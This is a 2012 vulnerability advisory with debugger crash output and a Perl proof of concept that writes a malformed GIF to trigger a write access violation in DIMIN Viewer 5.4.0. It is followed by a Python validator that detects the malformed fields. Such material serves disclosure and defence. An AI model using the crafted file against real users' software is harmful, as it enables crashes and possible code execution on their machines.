SECURITYVULNS:DOC:28855
Dec 11, 2012

DIMIN Viewer 5.4.0 <= WriteAV Arbitrary Code Execution


#!/usr/bin/perl
#
# DIMIN Viewer 5.4.0 <= WriteAV Arbitrary Code Execution
#
# Author: Jean Pascal Pereira <[email protected]>
#
# Vendor URI: http://www.dimin.net
#
# Vendor Description:
#
# View images in countless formats, and apply a variety of effects with this small, fast, and powerful
# application. Dimin Viewer incorporates unique visualization ideas, like Panoramic Photographs Tool
# and Big Image Navigator. It also features a multi-language interface to feel yourself at home!
#
# Debug info:
#
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# CommandLine: "C:\Program Files\DIMIN\Viewer5\imgview5.exe" C:\research\Viewer5\crafted.gif
# Symbol search path is: *** Invalid***
# ****************************************************************************
# * Symbol loading may be unreliable without a symbol search path.           *
# * Use .symfix to have the debugger choose a symbol path.                   *
# * After setting your symbol path, use .reload to refresh symbol locations. *
# ****************************************************************************
# Executable search path is:
# ModLoad: 00400000 006bb000   image00400000
# ModLoad: 7c900000 7c9b2000   ntdll.dll
# ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
# ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\advapi32.dll
# ModLoad: 77e70000 77f03000   C:\WINDOWS\system32\RPCRT4.dll
# ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
# ModLoad: 773d0000 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll
# ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
# ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
# ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
# ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
# ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\comdlg32.dll
# ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.dll
# ModLoad: 774e0000 7761e000   C:\WINDOWS\system32\ole32.dll
# ModLoad: 77120000 771ab000   C:\WINDOWS\system32\oleaut32.dll
# ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\version.dll
# ModLoad: 76b40000 76b6d000   C:\WINDOWS\system32\winmm.dll
# ModLoad: 73000000 73026000   C:\WINDOWS\system32\winspool.drv
# (fdc.b98): Break instruction exception - code 80000003 (first chance)
# ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.DLL
# ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
# ModLoad: 74720000 7476c000   C:\WINDOWS\system32\MSCTF.dll
# ModLoad: 755c0000 755ee000   C:\WINDOWS\system32\msctfime.ime
# ModLoad: 00e50000 00ef7000   C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_dcraw.dll
# ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
# ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
# ModLoad: 00f20000 0102f000   C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll
# ModLoad: 01050000 0106a000   C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_morphology.dll
# ModLoad: 01090000 010ba000   C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_xtdFilters.dll
# (fdc.b98): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0
# eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# *** WARNING: Unable to verify checksum for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll -
# div5_xtd_formats!divGetFilter+0x80c8b:
# 00fb1a7b 660f7f6740      movdqa  xmmword ptr [edi+40h],xmm4 ds:0023:01471000=???
#
# 0:000> r;!exploitable -v;q
# eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0
# eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# div5_xtd_formats!divGetFilter+0x80c8b:
# 00fb1a7b 660f7f6740      movdqa  xmmword ptr [edi+40h],xmm4 ds:0023:01471000=???
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll -
# Exception Faulting Address: 0x1471000
# First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Write Access Violation
# Exception Hash (Major/Minor): 0x550b2f71.0x55423571
# Stack Trace:
# div5_xtd_formats!divGetFilter+0x80c8b
# div5_xtd_formats!divGetFilter+0x80d0a
# div5_xtd_formats+0xc821
# div5_xtd_formats+0xcc07
# Instruction Address: 0x0000000000fb1a7b

# Proof of Concept:

use strict;
use warnings;

# Crafted GIF: a valid GIF89a header and 16-entry global colour table, then an
# image descriptor whose LZW minimum code size byte is 0xFE and whose image
# data sub-block declares 4 bytes but is cut short after one.
my $crafted = "\x47\x49\x46\x38\x39\x61\x30\x00\x2C\x00\xB3\x00\x00\x00\x00\x00".
"\x80\x00\x00\x00\x80\x00\x80\x80\x00\x00\x00\x80\x80\x00\x80\x00".
"\x80\x80\x80\x80\x80\xC0\xC0\xC0\xFF\x00\x00\x00\xFF\x00\xFF\xFF".
"\x00\x00\x00\xFF\xFF\x00\xFF\x00\xFF\xFF\xFF\xFF\xFF\x21\xF9\x04".
"\x01\x00\x00\x0F\x00\x2C\x00\x00\x00\x00\x30\x00\x2C\x00\x00\xFE".
"\x04\xF0";

# Write the bytes unmodified (raw layer, no newline translation on Windows).
open(my $fh, ">:raw", "crafted.gif") or die "crafted.gif: $!";
print $fh $crafted;
close($fh) or die "crafted.gif: $!";

# http://0xffe4.org
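As an added example that is not part of the advisory, the following Python check walks the GIF block structure of the proof-of-concept bytes above and reports the fields a hardened decoder should reject before allocating or filling pixel buffers: the out-of-range LZW minimum code size (0xFE) and the image data sub-block that runs past the end of the file. The 2..8 code-size range is an assumption (the range common GIF decoders accept); the 1x1 control image is constructed.

```python
# The crafted GIF from this advisory's proof of concept, embedded byte-for-byte
# (82 bytes, identical to the Perl PoC above) so the check runs offline.
CRAFTED_GIF = bytes.fromhex(
    "47494638396130002c00b30000000000" "80000000800080800000008080008000"
    "8080808080c0c0c0ff000000ff00ffff" "000000ffff00ff00ffffffffff21f904"
    "0100000f002c0000000030002c0000fe" "04f0"
)
# Constructed control: the well-known minimal 1x1 GIF, structurally complete.
VALID_GIF = bytes.fromhex(
    "47494638396101000100800000" "000000ffffff" "2c000000000100010000" "0202440100" "3b"
)

def skip_subblocks(data, pos, findings):
    """Advance past length-prefixed data sub-blocks; record if they overrun the file."""
    while pos < len(data) and data[pos] != 0:
        if pos + 1 + data[pos] > len(data):
            findings.append(f"sub-block of {data[pos]} bytes at offset {pos} overruns the file")
            return len(data)
        pos += 1 + data[pos]
    if pos >= len(data):
        findings.append("sub-block chain has no terminator")
    return pos + 1

def check_gif(data):
    """Walk the GIF block structure; return the findings a hardened decoder rejects on."""
    findings = []
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return ["not a GIF87a/GIF89a file"]
    pos = 13                               # header + logical screen descriptor
    if data[10] & 0x80:                    # global colour table: 2^(n+1) RGB entries
        pos += 3 * (2 << (data[10] & 7))
    while pos < len(data):
        introducer = data[pos]
        if introducer == 0x3B:             # trailer: well-formed end of file
            return findings
        if introducer == 0x21:             # extension: label byte, then sub-blocks
            pos = skip_subblocks(data, pos + 2, findings)
        elif introducer == 0x2C:           # image descriptor (10 bytes) + optional local CT
            pos += 10
            if pos <= len(data) and data[pos - 1] & 0x80:
                pos += 3 * (2 << (data[pos - 1] & 7))
            if pos >= len(data):
                return findings + ["truncated before LZW minimum code size"]
            mcs = data[pos]                # the PoC sets this byte to 0xFE
            if not 2 <= mcs <= 8:          # assumption: range common decoders accept
                findings.append(f"LZW minimum code size {mcs} outside 2..8")
            pos = skip_subblocks(data, pos + 1, findings)
        else:
            return findings + [f"unknown block introducer 0x{introducer:02x} at {pos}"]
    findings.append("no trailer byte 0x3B (file truncated)")
    return findings
```

Run against the PoC it reports three structural defects; the same walk returns an empty list for the control image, so it can sit in front of a decoder as a cheap pre-parse gate or in a triage script over suspicious samples.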